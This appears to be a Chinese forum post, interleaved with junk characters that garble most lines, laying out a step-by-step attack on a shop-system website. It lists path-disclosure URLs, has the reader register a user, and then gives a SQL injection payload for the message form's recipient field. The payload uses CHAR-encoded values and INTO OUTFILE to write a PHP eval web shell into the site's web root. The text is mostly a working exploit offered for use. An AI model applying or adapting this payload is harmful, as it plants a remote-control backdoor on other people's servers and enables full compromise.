第一个:想办法找到目标网站的绝对路径
+ {+ g7 Z# v# S9 h$ k
7 V% T2 C' t8 D5 N5 Ghttp://www.political-security.com/install/svinfo.php?phpinfo=true! W7 ^$ Y6 t; Y0 l1 C/ C
, @% w! I" I9 I+ l! |' A
http:/www.political-security.com/core/api/shop_api.php3 z7 q! S, v, z! G' N8 m) |$ e3 X
7 v# J3 E3 m6 P P- i$ Bhttp://www.political-security.co ... api_b2b_2_0_cat.php
- `; z& i. y3 ^
5 D9 y5 R( k3 t! i( R: Z2 U/ jhttp://www.political-security.com/core/ap ... b_2_0_goodstype.php4 h) ]0 g' i1 Z5 O3 o1 f
. I5 h; [" M2 ^0 q3 Q# \6 _9 w5 ?" xhttp://www.political-security.co ... i_b2b_2_0_brand.php
, D5 A* w! F4 w/ R4 C' |$ I第二个:注册一个普通用户1 o. u6 G- a C0 \) b
; D6 P* D4 X+ Z7 _2 Thttp://www.political-security.com/?passport-signup.html
, ]5 d; B* X, S. v3 e h9 k
% a6 B( W E7 [6 u1 u4 H第三个: 发送消息
/ X4 ]1 |; A% F) [ x
' ^6 v7 v- ~; Q2 O: xhttp://www.political-security.com/?member-send.html4 X$ Q( j! v) v. i" a
发送给中填写
6 Q/ \; ]8 D, {antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |